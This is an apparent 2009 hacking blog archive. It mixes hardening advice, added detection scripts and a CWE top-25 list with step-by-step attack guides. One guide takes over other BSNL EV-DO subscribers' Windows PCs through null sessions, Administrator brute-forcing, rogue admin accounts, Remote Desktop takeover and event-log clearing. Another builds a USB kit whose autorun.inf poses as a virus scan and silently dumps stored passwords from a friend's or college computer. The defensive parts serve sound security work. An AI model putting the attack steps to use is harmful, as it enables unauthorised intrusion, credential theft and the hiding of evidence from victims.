
Monday, September 14, 2009

Remove Hidden Shares from Win32 Boxes

NetBIOS over TCP/IP is a common way in for intruders on a LAN: the NetBIOS Session Service listens on TCP port 139, and on Windows 2000 and later SMB also listens directly on TCP port 445. If either port is reachable, an attacker can take advantage of the hidden shares that every Windows NT, 2000 and XP box creates at startup: ADMIN$ (the Windows directory), C$, D$ and so on (one per fixed drive), and IPC$ (Inter-Process Communication, the named-pipe share used for remote administration and enumeration). With nothing more than the 'net use' command that ships with Windows, the attacker opens a "null session" to IPC$ (an anonymous connection with an empty user name and password) and, unless RestrictAnonymous is set, enumerates users, groups and shares. That enumeration is the first step of the attack in the next post: guess an administrator password, connect to C$ or ADMIN$, create a user account, and take the box over through Remote Desktop or a telnet service.

Here are the countermeasures.

Registry: disable the automatic administrative shares. This stops C$, D$ and ADMIN$ from being recreated at boot; it does not remove IPC$, which Windows needs for its own remote administration.
System Key: [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > LanmanServer > Parameters]
Value Name: AutoShareWks (workstation editions) or AutoShareServer (server editions)
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable automatic shares, 1 = enable, the default)

To limit what an anonymous IPC$ session can see, also set RestrictAnonymous (and on XP, RestrictAnonymousSAM) to 1 under [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control > Lsa], and block TCP 139 and 445 at the firewall from any network that does not need file sharing.

Computer Management: go to Run, type compmgmt.msc to open Computer Management, expand 'Shared Folders', click 'Shares', right-click the share you want to remove and choose 'Stop Sharing'.

Note: stopping a share from the Computer Management console removes it only until the next reboot or restart of the Server service, because Windows recreates the administrative shares at startup. For a permanent removal, add AutoShareWks (or AutoShareServer) in the registry as above.
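To turn the procedure above into something you can run across a fleet, here is an added example (not code from the original post): it parses the text output of the built-in `net share` command, separates IPC$ and the automatic drive/ADMIN$ shares from ordinary shares, and renders a .reg file with the registry values described above. The `net share` output it parses is a constructed sample, and the choice of RestrictAnonymous=1 plus RestrictAnonymousSAM=1 is the assumption made here for limiting null sessions.

```python
# Added example (not part of the original post): audit the shares a Windows box
# advertises from the text output of `net share`, separate the automatic
# hidden shares the post is about from ordinary ones, and render a .reg file
# with the hardening values named above (AutoShareWks/AutoShareServer=0 plus
# RestrictAnonymous=1 for IPC$ null sessions). The sample output is constructed.
import re

# Constructed sample of `net share` output from an XP-era workstation.
SAMPLE_NET_SHARE = """\
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\\                             Default share
D$           D:\\                             Default share
ADMIN$       C:\\WINDOWS                      Remote Admin
IPC$                                         Remote IPC
Public       C:\\Users\\Public
The command completed successfully.
"""

DRIVE_SHARE = re.compile(r"^[A-Z]\$$")   # C$, D$, ...


def share_names(net_share_output):
    """Return the share names from `net share` output, in listed order."""
    names = []
    for line in net_share_output.splitlines():
        stripped = line.strip()
        # Skip the header row, the dashed rule, blank lines and the status footer.
        if not stripped or stripped.startswith(("Share name", "---", "The command")):
            continue
        names.append(stripped.split()[0])
    return names


def classify(name):
    """Group a share name the way the post does: IPC$, admin shares, other hidden, visible."""
    if name == "IPC$":
        return "ipc"
    if name == "ADMIN$" or DRIVE_SHARE.match(name):
        return "admin"
    if name.endswith("$"):        # a trailing $ only hides a share from browsing
        return "hidden"
    return "visible"


def audit(net_share_output):
    """Map each class to the share names found; the 'admin' ones go away with AutoShare*=0."""
    report = {"ipc": [], "admin": [], "hidden": [], "visible": []}
    for name in share_names(net_share_output):
        report[classify(name)].append(name)
    return report


def hardening_reg(server_edition=False):
    """Text of a .reg file applying the registry changes described in the post.

    AutoShareWks applies to workstation editions, AutoShareServer to server
    editions; neither removes IPC$, so RestrictAnonymous is set as well to
    stop anonymous (null-session) enumeration through it."""
    auto_share = "AutoShareServer" if server_edition else "AutoShareWks"
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]",
        f'"{auto_share}"=dword:00000000',
        "",
        r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]",
        '"RestrictAnonymous"=dword:00000001',
        '"RestrictAnonymousSAM"=dword:00000001',
        "",
    ]
    return "\r\n".join(lines)


if __name__ == "__main__":
    print(audit(SAMPLE_NET_SHARE))
    print(hardening_reg())
```

Feed it the real output (`net share > shares.txt` on the box in question) and import the generated .reg with regedit; the automatic shares disappear after the Server service restarts, while IPC$ stays but stops answering anonymous enumeration.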

Root the Machines that are using BSNL EV-DO

BSNL is a state-owned telecom operator in India that offers telephone and broadband services, including USB data modems for rent or purchase. This technique works on almost all of the ZTE EV-DO USB modems BSNL provides. EV-DO (Evolution-Data Optimized, originally "Evolution-Data Only") is a 3G data standard developed by Qualcomm. The point of this post is that all EV-DO subscribers sit on one network with no isolation between them, so Windows file sharing on one subscriber's box is reachable from every other subscriber's box, and from there the machine can be taken over completely.

This works only against Windows boxes.

Step 1: Install the driver for the BSNL ZTE EV-DO modem (it prompts you to plug in the device during installation), change the default user name and password, and connect to the internet.

Step 2: While the modem is connected, open a command prompt and type

net view

This lists the NetBIOS names of the machines on the same network that use the same kind of device. It blindly prints the hostnames from the browse list and does not tell you which of them are actually up. The list of hostnames I got when I tried this served as proof of concept.

Step 3: Now the main job is to find a host that is alive, either by hand (ping, net view \\hostname) or with a small batch script. Once you have one, connect to its hidden IPC$ (Inter-Process Communication) share with an anonymous "null session":

net use \\IP-Address\IPC$ "" /user:""

This establishes a null session with the target. Your computer and the target are now connected as an anonymous user, which on a box with the default RestrictAnonymous=0 lets you enumerate users and shares; it does not by itself give file or administrative access, so we have to go further.

Step 4: To confirm the connection, type

net use

which lists the current connections.

Step 5: Every Windows box has a built-in Administrator account, and some people never set a password on it. To gain administrator access on the remote box, run a dictionary or brute-force attack against that account over the same IPC$ share. Two caveats: Windows XP by default refuses network logons to local accounts with a blank password (the "Limit local account use of blank passwords to console logon only" policy), and XP with Simple File Sharing enabled maps every network logon to Guest, so on those boxes a blank or guessed Administrator password gets you nothing over the network. Every failed guess is also written to the target's Security log if logon auditing is on.

You can run the dictionary attack with the batch file from the post "LAN Remote user - Dictionary Attack" further down this page; check the syntax carefully before starting.

Step 6: Once you have the administrator password, use the same net command to connect with administrator rights:

net use \\IP-Address\sharename "password" /user:administrator

(C$ or ADMIN$ are the obvious share names.) When you see "The command completed successfully" you are connected to the target with admin access.

Step 7: Go to Run and type compmgmt.msc to open Computer Management. Click Action -> Connect to another computer... and type in the IP address or hostname of the target. Once connected, the title "Computer Management (Local)" changes to "Computer Management (XXX.XXX.XXX.XXX)", the remote IP.

Step 8: Create a new user account on the remote machine by expanding Local Users and Groups -> Users, right-clicking and choosing New User, then add it to the Administrators group.

Step 9: Start a terminal services session to the remote host, i.e. a Remote Desktop connection: go to Run, type mstsc and press Enter.

Step 10: Type the IP address of the remote host in the Remote Desktop Connection dialog and take over the computer.

Step 11: To cover traces, the attacker clears all the event logs on the target through the same Computer Management console and drops the IPC$ connection with

net use \\IP-Address\IPC$ /delete

Note that clearing the Security log is itself recorded as the first event in the fresh log, so a defender can still see when it happened.

This is a serious security threat: anyone on the network can take control of such a computer, root it, and turn it into a zombie in a botnet.

Step 12: To avoid becoming a victim of this kind of attack, read the article on removing hidden shares by clicking here.

Disclaimer:
This is only meant for educational purposes. Neither the author nor the publisher takes any responsibility for illegal activity.
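Seen from the defender's side, every step of the chain above leaves a trace in the target's Security log: the null session, the burst of failed logons, the successful logon that follows them, the new account, the group change and the log clear. The following is an added example (not from the original post) of detection logic over those events. The events are constructed, with the Vista/2008-and-later event IDs (4624 logon, 4625 failed logon, 4720 user created, 4732 member added to a local group, 1102 audit log cleared); the XP/2000-era equivalents are 540, 529, 624, 636 and 517. The IP address, account names and thresholds are assumptions made for the example.

```python
# Added example (not from the original post): detection logic for the
# null session -> password guessing -> new admin account -> log clear chain,
# run over constructed Windows Security log events. Event IDs are the
# Vista/2008+ ones; see the lead-in for the XP-era equivalents. The sample
# events, IP address, account names and thresholds are made up.
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5           # failed network logons from one IP that count as guessing
WINDOW = timedelta(minutes=30)

# Constructed events: (timestamp, event id, EventData fields).
SAMPLE_EVENTS = [
    ("2009-09-14T09:00:00", 4624, {"TargetUserName": "alice", "LogonType": "2", "IpAddress": "-"}),
    ("2009-09-14T22:01:10", 4624, {"TargetUserName": "ANONYMOUS LOGON", "LogonType": "3", "IpAddress": "10.20.30.40"}),
] + [
    ("2009-09-14T22:01:%02d" % (12 + i), 4625,
     {"TargetUserName": "Administrator", "LogonType": "3", "IpAddress": "10.20.30.40"})
    for i in range(6)
] + [
    ("2009-09-14T22:03:05", 4624, {"TargetUserName": "Administrator", "LogonType": "3", "IpAddress": "10.20.30.40"}),
    ("2009-09-14T22:04:00", 4720, {"TargetUserName": "support", "SubjectUserName": "Administrator"}),
    ("2009-09-14T22:04:05", 4732, {"MemberName": "support", "TargetUserName": "Administrators", "SubjectUserName": "Administrator"}),
    ("2009-09-14T22:09:30", 1102, {"SubjectUserName": "support"}),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def detect_chain(events, fail_threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return (code, detail) alerts, in chronological order per source IP."""
    evs = sorted(((_ts(t), eid, f) for t, eid, f in events), key=lambda e: e[0])
    alerts = []
    # Host-level follow-on actions carry no source IP; match them by time instead.
    followups = [(t, eid, f) for t, eid, f in evs if eid in (4720, 4732, 1102)]

    # Network logons (LogonType 3) grouped by the client address.
    network = {}
    for t, eid, f in evs:
        ip = f.get("IpAddress", "-")
        if ip != "-" and f.get("LogonType") == "3":
            network.setdefault(ip, []).append((t, eid, f))

    for ip in sorted(network):
        entries = network[ip]
        # Step 3 of the post: an anonymous network logon is a null session to IPC$.
        anon = [t for t, eid, f in entries if eid == 4624 and f["TargetUserName"] == "ANONYMOUS LOGON"]
        if anon:
            alerts.append(("null_session", f"{ip} opened a null session at {anon[0]:%H:%M:%S}"))
        # Step 5: a run of failed network logons from one address.
        fails = [t for t, eid, f in entries if eid == 4625]
        if len(fails) >= fail_threshold:
            alerts.append(("dictionary_attack", f"{len(fails)} failed network logons from {ip}"))
        # A success shortly after many failures means the password was guessed.
        for t, eid, f in entries:
            if eid != 4624 or f["TargetUserName"] == "ANONYMOUS LOGON":
                continue
            recent = [x for x in fails if t - window <= x <= t]
            if len(recent) < fail_threshold:
                continue
            user = f["TargetUserName"]
            alerts.append(("credential_guessed", f"{user} logged on from {ip} after {len(recent)} failures"))
            # Steps 8 and 11: what happened on the host within the window after that logon.
            for t2, eid2, f2 in followups:
                if not (t <= t2 <= t + window):
                    continue
                if eid2 == 4720:
                    alerts.append(("account_created", f"{f2['SubjectUserName']} created account {f2['TargetUserName']}"))
                elif eid2 == 4732:
                    alerts.append(("admin_group_change", f"{f2['MemberName']} added to {f2['TargetUserName']}"))
                elif eid2 == 1102:
                    alerts.append(("log_cleared", f"audit log cleared by {f2['SubjectUserName']}"))
    return alerts


if __name__ == "__main__":
    for code, detail in detect_chain(SAMPLE_EVENTS):
        print(f"{code:20s} {detail}")
```

The 1102 event survives the "cover your traces" step because it is written to the freshly emptied log, which is why the detector still fires on it; in a real deployment the events would be forwarded off the box before the attacker can clear them.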

Saturday, September 12, 2009

Unlock Yahoo when Account is Blocked

This is a very easy but useful trick; it describes how Yahoo! behaved in 2009, and the addresses below are from that time. When you or someone else enters an incorrect password too many times, Yahoo! locks the account "for security reasons" and you cannot sign in to your chat names. The good thing is that these locks are a piece of cake to get around. All you need is a list of Yahoo! login servers.

Every time you sign in you go through a particular login server, which hands your browser a cookie, an ID token that proves to the rest of Yahoo! that you are who you claim to be and that the account is yours. When someone runs a "locking tool" against your name, all it does is sign in over and over with a wrong password until that login server stops accepting logins for your account. So when you find yourself locked out, what you need is a fresh cookie. How do you get one when the server you were using has blocked you? Simple: use another server. Yahoo! ran separate regional login servers, more than I would care to count, and the lock was not shared between them. Paste one of the addresses below into your browser and sign in on the page you get; unless you have been locked on that server as well, you receive a fresh cookie and can sign in to Messenger again.

Many people try to sign in through their mail page to unlock an account, but a smart locker blocks the mail login first and then the chat login, and most people give up when mail is blocked too. That is why I do not bother with the mail route. I simply pick another server, sign in, and I am good to go. There are so many servers that it is impossible to lock them all, and even if someone could, the lock only lasts about 12 hours.

Some Yahoo! login servers:
http://cn.mail.yahoo.com/?id=77070 CHINA
http://edit.india.yahoo.com/config/mail?.intl=in INDIA
http://edit.europe.yahoo.com/config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/mail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/login USA

Yahoo! Chat logins:
http://hk.chat.yahoo.com/?myHome HK
http://tw.chat.yahoo.com/?myHome Taiwan
http://in.chat.yahoo.com/?myHome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?myHome Singapore
http://chinese.chat.yahoo.com/?myHome Chinese
http://cn.chat.yahoo.com/?myHome China
http://asia.chat.yahoo.com/?myHome Asia
http://au.chat.yahoo.com/?myHome Australia & NZ
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/chatbylycos.html France
http://de.docs.yahoo.com/chat/chatbylycos.html Germany
http://it.docs.yahoo.com/chat/chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat/chatbylycos.html UK & Ireland
http://ar.chat.yahoo.com/?myHome Argentina
http://br.chat.yahoo.com/?myHome Brazil
http://espanol.chat.yahoo.com/?myHome South America
http://mx.chat.yahoo.com/?myHome Mexico
http://ca.chat.yahoo.com/?myHome Canada
http://world.yahoo.com/ World of Yahoo

Cheers and keep learning.

Wednesday, September 9, 2009

How to detect computer & email monitoring or spying software

Computer Monitoring
So if you still think someone is spying on you, here is what you can do. The good news is that neither Windows XP SP3 nor Windows Vista supports more than one interactive session at a time (there is a hack for this, but I would not worry about it). This means that if you are logged in to your XP or Vista computer, as you are now if you are reading this, and someone connected to it with the BUILT-IN Remote Desktop feature of Windows, your screen would be locked and it would show who is connected. Why is that useful? Because it means that anyone who wants to watch YOUR session without you noticing or your screen being taken over has to use third-party software, and third-party software is a lot easier to spot than a normal Windows process. So we are looking for third-party software, usually called remote control software or virtual network computing (VNC) software.

First, the easy thing: look through Start Menu > All Programs for anything like VNC, RealVNC, TightVNC, UltraVNC, LogMeIn, GoToMyPC and so on. IT people are often sloppy and assume a normal user will not know what a piece of software is and will simply ignore it. If one of these programs is installed, someone can connect to your computer without you knowing as long as it is running in the background as a Windows service.

That brings us to the second point. If one of the programs above is installed there is usually an icon for it in the notification area of the task bar, because it has to run constantly to work. Check all of your icons (even the hidden ones) and see what is running. If you find something you have not heard of, do a quick Google search to see what pops up. It is quite hard to keep something out of the notification area, so if monitoring software is installed it should show up there. If someone really sneaky installed it and nothing shows up, try another way.

Because these are third-party applications, they have to accept connections on their own network ports (a port is simply a numbered endpoint through which programs on two computers exchange data; VNC servers listen on TCP 5900 by default and Remote Desktop on TCP 3389). As you may already know, XP and Vista come with a built-in firewall that blocks most incoming ports for security reasons. If you are not running an FTP server, why should TCP port 21 be open? So for a remote-control program to accept a connection, its port has to be opened in that firewall. You can see what has been opened by going to Start, Control Panel, Windows Firewall.

Click on the Exceptions tab and you will see a list of programs with check boxes next to them. The checked ones are allowed through ("open"); the unchecked or unlisted ones are blocked ("closed"). Go through the list for anything you are not familiar with or that matches VNC, remote control and so on. If you find one, block it by unchecking the box. (From a command prompt, netstat -ano lists every listening port with the PID of the process behind it, and tasklist tells you which program that PID is.)

The only other way I can think of to see whether someone is connected to your computer is to look for processes running under a different user name. Open Windows Task Manager (press Ctrl + Shift + Esc together), go to the Processes tab and tick "Show processes from all users" if it is there; you will see a column titled User Name. Scroll through all the processes and you should only see your own user name, LOCAL SERVICE, NETWORK SERVICE and SYSTEM. Another account name in that column means someone else has a session on this computer, whether through fast user switching or remotely.

Email & Web Site Monitoring

Checking whether your email is being monitored is quite simple. Whenever you send an email from Outlook or another mail client on your computer, it has to connect to a mail server, either directly or through what is called a proxy server, which takes a request, inspects or alters it and forwards it on to the real server. If your email or web browsing goes through a proxy, the sites you visit and the emails you write can be stored and read later. You can check for both, and here is how. In IE, go to Tools, then Internet Options, click on the Connections tab and choose LAN Settings.

If the Proxy Server box is checked and holds a local IP address with a port number, your requests go to a local server before they reach the web server. That means every site you visit first passes through another machine running software that either blocks the address or simply logs it. For your email you are checking for the same thing: a local IP address for the POP and SMTP mail servers. In Outlook, go to Tools, Email Accounts, click Change or Properties, and read the values for the POP and SMTP server.

If you work in a big corporate environment, the Internet and email are more than likely monitored, so always be careful about what you write and which web sites you browse while at the office. Trying to get past the monitoring might also get you in trouble if they find out you bypassed their systems!
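The manual checks above (task bar icons, firewall exceptions, Task Manager) can be reduced to two built-in commands, `netstat -ano` for listening ports and `tasklist` for the process behind each PID. The code below is an added example (not from the original post) that parses constructed output of those two commands and flags the signs of remote-control software: a listener or live connection on a remote-control port, and process names belonging to the tools the post lists. The port numbers and image names are the usual defaults of those tools and are assumptions to extend for your environment.

```python
# Added example (not from the original post): a scripted version of the manual
# checks above, run over constructed `netstat -ano` and `tasklist` output.
# The port list and image names are assumptions (the usual defaults of the
# remote-control tools named in the post); the sample output is made up.

# Default listening ports of common remote-control software.
REMOTE_CONTROL_PORTS = {
    3389: "Remote Desktop (built in; check who is allowed to use it)",
    5900: "VNC server",
    5800: "VNC server, browser viewer",
    5631: "pcAnywhere",
}
# Image names of the tools the post says to look for; matched case-insensitively.
REMOTE_CONTROL_IMAGES = {
    "winvnc.exe", "winvnc4.exe", "tvnserver.exe", "vncserver.exe",
    "logmein.exe", "g2comm.exe", "g2svc.exe",
}

# Constructed `netstat -ano` output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       2316
  TCP    192.168.1.10:5900      192.168.1.77:49210     ESTABLISHED     2316
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1024
"""

# Constructed `tasklist` output.
SAMPLE_TASKLIST = """\

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
svchost.exe                    884 Console                    0      5,012 K
winvnc.exe                    2316 Console                    0      7,436 K
explorer.exe                  1560 Console                    0     31,104 K
"""


def parse_netstat(text):
    """Return (proto, local_port, foreign, state, pid) for each connection row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[0], parts[1], parts[2]
        # UDP rows have no State column, so take the PID from the last field.
        state = parts[3] if proto == "TCP" else ""
        pid = int(parts[-1])
        port = int(local.rsplit(":", 1)[1])
        rows.append((proto, port, foreign, state, pid))
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith(("Image Name", "=")):
            continue
        # Image names can contain spaces ("System Idle Process"); the PID is
        # the first purely numeric field and everything before it is the name.
        for i, p in enumerate(parts):
            if p.isdigit():
                procs[int(p)] = " ".join(parts[:i])
                break
    return procs


def find_remote_control(netstat_text, tasklist_text):
    """Flag listeners on remote-control ports, live sessions on them, and known images."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for proto, port, foreign, state, pid in parse_netstat(netstat_text):
        image = procs.get(pid, "?")
        if port in REMOTE_CONTROL_PORTS and state == "LISTENING":
            findings.append(("listener", port, pid, image, REMOTE_CONTROL_PORTS[port]))
        elif port in REMOTE_CONTROL_PORTS and state == "ESTABLISHED":
            findings.append(("connected", port, pid, image, f"peer {foreign}"))
    for pid, image in procs.items():
        if image.lower() in REMOTE_CONTROL_IMAGES:
            findings.append(("process", None, pid, image, "known remote-control image"))
    return findings


if __name__ == "__main__":
    for kind, port, pid, image, note in find_remote_control(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print(f"{kind:10s} port={port} pid={pid} image={image}  {note}")
```

A "connected" finding is the strongest signal: it means someone is attached to the VNC server right now, and the peer address tells you from where.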

Tuesday, September 1, 2009

Protech OS Installation

How to Install Protech OS ? [For Absolute Beginners]
I am writing this tutorial for people who are new to Linux distributions and their installation. It assumes you already have Windows XP installed, and the method suits a dual-boot setup (Windows and Linux side by side). The original post includes screenshots for clarity.

Partitioning

It helps to have Hiren's BootCD to resize the disk and format a part of it (or the whole disk) for the Protech installation. Boot the Hiren CD and resize or create the partition you want to install into; format it as ext2 or ext3. I normally use Norton PartitionMagic, the first entry under Hiren Boot Menu -> Partition Tools. Hiren's CD contains many useful disk, recovery and security tools; take a look at the sample screenshot in the original post.

Once that step is done you get a graphical partitioning window where you can finish the job with the mouse, provided the Hiren CD has a driver for it by default. Remember to give the Protech partition at least 5 GB.

Load the Protech CD

Reboot the computer after partitioning and formatting, put the Protech OS CD into the drive and boot from it. Then follow these steps:

1. Select the Install or Upgrade option, the first entry in the boot menu.
2. If you want to run a memory or CD/DVD error check, use the 3rd and 4th options.
3. Wait until the desktop loads. The CD boots as a live system by default, so you must wait for the desktop to come up. Protech is based on Ubuntu, so the Ubuntu and Debian software repositories can be used by default.
4. Once the desktop is loaded, navigate the menus and options simply by right-clicking with the mouse.
5. The Applications menu holds Editors, Multimedia, Net, Programming and System Utilities.
6. Next comes the Security Tools menu, the one that sets Protech OS apart from other security distributions: a good collection of recognised security software to play with.
7. You may change the default theme to your liking in the Fluxbox menu.
8. Go to "HOME" to begin the installation. In the new window you will see a single icon named Install when running from the live CD.
9. In the pop-up window select the default settings to be configured; this is similar to the Windows or Ubuntu installation steps.
10. It is very important that you select the partition you allotted earlier with Hiren's BootCD.
11. Configure your root login and password, confirm the partition selection and begin the installation.
12. Once it starts, expect to wait 20 to 30 minutes (depending on processor speed) while the compressed files are copied from the CD to the hard drive.
13. Installation completed: it prompts you to reboot (remove the CD from the CD/DVD drive).
14. That is it. You are ready to use Protech OS with its security tools. It also works as a fine desktop OS for me.

Thursday, August 27, 2009

Hack Passwords Using USB Drive

Today I will show you how to grab stored passwords with a USB pen drive. Windows and the programs on it store many of the passwords used day to day: instant messenger passwords (MSN, Yahoo, AOL, Windows Messenger and so on), Outlook Express, SMTP, POP and FTP account passwords, and the auto-complete passwords of browsers like IE and Firefox. There are tools that recover these passwords from where they are stored, and with those tools and a USB pen drive you can build a password-grabbing kit to use on a friend's or college computer. (The original post calls it a rootkit, but nothing here hides itself or touches the kernel; it is a set of password-recovery utilities run from an autorun script.) We need the following NirSoft tools:

MessenPass: recovers the passwords of the most popular instant messengers: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger (the one provided with Netscape 7), Trillian, Miranda and GAIM.

Mail PassView: recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird and Group Mail Free. It can also recover the passwords of web-based email accounts (Hotmail, Yahoo!, Gmail) if you use the associated desktop programs for them.

IE PassView: a small utility that reveals the passwords stored by Internet Explorer. It supports Internet Explorer 7.0 as well as the older versions 4.0 to 6.0.

Protected Storage PassView: recovers all passwords kept in the Protected Storage, including Internet Explorer's AutoComplete passwords, passwords of password-protected sites, MSN Explorer passwords and more.

PasswordFox: a small password recovery tool that shows the user names and passwords stored by the Mozilla Firefox web browser. By default it shows the passwords of the current profile, but you can select any other Firefox profile. For each entry it shows: Record Index, Web Site, User Name, Password, User Name Field, Password Field and the Signons filename.

Here is the step-by-step procedure to build the kit. NOTE: antivirus products flag these tools as hack tools, so you must temporarily disable your antivirus before following these steps.

1. Download all five tools, extract them and copy only the executables (.exe files) to your USB pen drive, i.e. mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe.

2. Create a new Notepad file and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save it, rename it from New Text Document.txt to autorun.inf and copy autorun.inf to the USB drive. (ACTION is the label Windows shows for the entry in the AutoPlay dialog; it is what makes the entry look like a virus scan.)

3. Create another Notepad file and write the following text into it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save it, rename it from New Text Document.txt to launch.bat and copy launch.bat to the USB drive as well. (/stext writes each tool's results to a plain-text file instead of opening its window.)

Your kit is now ready. To use it on a friend's PC or a college computer, follow these steps:

1. Insert the pen drive; the AutoPlay window pops up because the drive carries an autorun.inf.
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. All the password tools run silently in the background (this takes hardly a few seconds) and write the passwords to the .TXT files on the drive.
4. Remove the pen drive; the stored passwords are in the .TXT files.

The tools themselves run on Windows 2000, XP, Vista and 7, but the AutoPlay trick only works where AutoRun from removable drives is enabled: Windows 7 ignores autorun.inf on USB drives, and on older versions the administrator may have turned it off, in which case launch.bat has to be run by hand.

NOTE: This procedure only recovers passwords that are already stored on the computer (if any).
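Because the whole trick hinges on autorun.inf, the defender's counterpart is to inspect that file before a drive's AutoPlay entry is trusted. The following is an added example (not from the original post): a small parser for the autorun.inf format that flags the keys which launch a program and the mismatch between a friendly ACTION label and what open= actually runs. The first sample reproduces the file from the post; the second is a constructed benign one, and the list of executable extensions is an assumption.

```python
# Added example (not from the original post): parse an autorun.inf and flag
# the entries that make a drive launch a program, plus the social-engineering
# mismatch between an ACTION= label and the open= target. Both sample files
# are constructed; the first reproduces the one in the post.
import configparser

MALICIOUS_INF = """\
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
"""

BENIGN_INF = """\
[AutoRun]
icon=setup.ico
label=Vendor Driver CD
"""

# Keys that cause code to run (or offer to run it) when the drive is inserted.
LAUNCH_KEYS = ("open", "shellexecute")
# Extensions treated as executable for the label-mismatch check (assumption).
EXECUTABLE_SUFFIXES = (".exe", ".bat", ".cmd", ".com", ".vbs", ".js", ".scr", ".pif")


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys.

    Windows treats both the section name and the keys case-insensitively."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k: v.strip() for k, v in cp.items(section)}
    return {}


def assess_autorun(text):
    """Return (severity, message) findings for an autorun.inf."""
    entries = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key in entries:
            findings.append(("high", f"{key}= launches {entries[key]!r} on insertion/AutoPlay"))
    # shell\<verb>\command= adds right-click verbs that run arbitrary commands.
    for key, value in entries.items():
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(("high", f"{key}= runs {value!r}"))
    action = entries.get("action")
    target = entries.get("open") or entries.get("shellexecute")
    if action and target and target.lower().endswith(EXECUTABLE_SUFFIXES):
        findings.append(("medium", f"ACTION label {action!r} disguises execution of {target!r}"))
    return findings


if __name__ == "__main__":
    for name, inf in (("post's autorun.inf", MALICIOUS_INF), ("benign", BENIGN_INF)):
        print(name, assess_autorun(inf) or "nothing to flag")
```

The check is deliberately dumb: any open= or shellexecute= on a removable drive is worth a look, and a label that promises a virus scan while pointing at a .bat file is exactly the pattern the post relies on.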

Coding errors that helped Hackers and Intruders

Some 25 software coding errors are behind the breaches that let cyber criminals into web sites and user accounts.

The SANS Institute in Maryland said that in 2008 just two of the errors led to more than 1.5 million web site security breaches. The organisations that helped compile the list, which include the US National Security Agency, the Department of Homeland Security, Microsoft and Symantec, published the document. "The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer of Veracode.

SANS director Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors." While most earlier advice focused on the vulnerabilities that originate from programming errors, this list examines the programming errors themselves; each entry is a CWE (Common Weakness Enumeration) identifier. The 25 Most Dangerous Programming Errors are:

CWE-116: Improper Encoding or Escaping of Output
CWE-89: Failure to Preserve SQL Query Structure (SQL injection)
CWE-20: Improper Input Validation
CWE-79: Failure to Preserve Web Page Structure (cross-site scripting)
CWE-78: Failure to Preserve OS Command Structure (OS command injection)
CWE-319: Cleartext Transmission of Sensitive Information
CWE-352: Cross-Site Request Forgery
CWE-362: Race Condition
CWE-209: Error Message Information Leak
CWE-119: Failure to Constrain Operations within the Bounds of a Memory Buffer
CWE-642: External Control of Critical State Data
CWE-73: External Control of File Name or Path
CWE-665: Improper Initialization
CWE-426: Untrusted Search Path
CWE-94: Failure to Control Generation of Code (code injection)
CWE-494: Download of Code Without Integrity Check
CWE-404: Improper Resource Shutdown or Release
CWE-682: Incorrect Calculation
CWE-285: Improper Access Control (Authorization)
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
CWE-259: Hard-Coded Password
CWE-732: Insecure Permission Assignment for Critical Resource
CWE-330: Use of Insufficiently Random Values
CWE-250: Execution with Unnecessary Privileges
CWE-602: Client-Side Enforcement of Server-Side Security

The list was produced by SANS and MITRE together with the National Security Agency (NSA) and about 30 other organisations.

Friday, August 21, 2009

LAN Remote user - Dictionary Attack (hack any system in lan)

